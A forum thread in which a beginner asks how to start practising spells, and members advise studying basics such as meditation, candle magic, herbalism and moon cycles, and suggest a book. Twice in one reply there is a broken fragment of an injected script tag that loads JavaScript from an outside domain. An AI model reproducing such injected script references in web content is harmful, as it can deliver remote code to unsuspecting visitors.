Help for a total newbie!

I am new to this site and I have no idea what I'm doing, so please help a fellow caster out! And I know that there is stuff on the internet that isn't real, so if you know how to discern between a real spell and a fake one, please teach me how to do so. First, start off with searching the forums for basics.

The basics are meditation, grounding, centering, visualization, and perhaps some energry manipulation.

There is much research, reading and practicing to be done. I would like to note though, that more than 70 percent of the spells on here do not work, but some do. With the help of your research and studies, you will come to find out which ones are logical and which ones are not.

But, I know you want to rush into this, but please do not. Take your time and enjoy the learning and the experience of your new found path.

I would definitely begin with the basics that Dukali mentions. These will give you a good solid foundation to draw from.
As for the spells: it's really common sense. Listen to your head when you are trying to decide the good from the bad.
The candles, incense, stones, etc are there to help to either raise or focus your energy toward your intention. Don't dismiss them until you try them.

Start with reading these;

Research your heart out. A lot of people on this website are insane so be careful. Study basic candle magic, herbalism, the moon cycles, esabbats and sabbats, astrology, safety, ect.... if you're wiccan or not (I'm not) get a book going with information that you gather. Never stop studying. I suggest also studying elemental magic it is very easy to do just he careful. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

I recommend doing all of the above and i also would recommend the book "Modern Magick 12 lessons in the High Magickal Arts"
